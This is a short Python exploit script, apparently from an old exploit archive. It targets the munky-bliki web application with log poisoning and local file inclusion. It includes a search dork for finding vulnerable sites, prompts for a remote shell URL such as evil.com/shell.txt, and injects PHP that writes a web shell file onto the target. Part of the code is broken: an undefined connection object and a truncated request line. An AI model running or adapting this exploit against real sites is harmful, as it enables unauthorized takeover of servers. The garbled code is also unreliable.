
# -*- coding: cp1256 -*-


####                               munky-bliki Lfi                              



#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                           

#Our Site : Http://IRCRASH.COM                                                  

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                   



#Script Download : 


#DORK : "Copyright © 2004 Dovid Kopel"                                          



#                                      [Bug]                                    



#                                     [Note]                                    


#By this exploit u can create a shell on valun site ;)                          



#                           Site : Http://IRCRASH.COM                           

###################################### TNX GOD 

import httplib,urllib

site=raw_input('Site [Ex www.r3d.com]: ')

path=raw_input('Path [Ex /munky]: ')

shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')

print "[*]Powered by : R3d.W0rm - [EMAIL PROTECTED]"


print "[*]Connected to " + site

print "[*]Sending shell code ..."

conn.request('GET',path + 
 + shell + "\\';?>');fclose($fp);?>")

print "[*]Running shell code ..."

data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')

print "[*]Shell created"

print "[*]" + site + path + '/r3d.w0rm.php'

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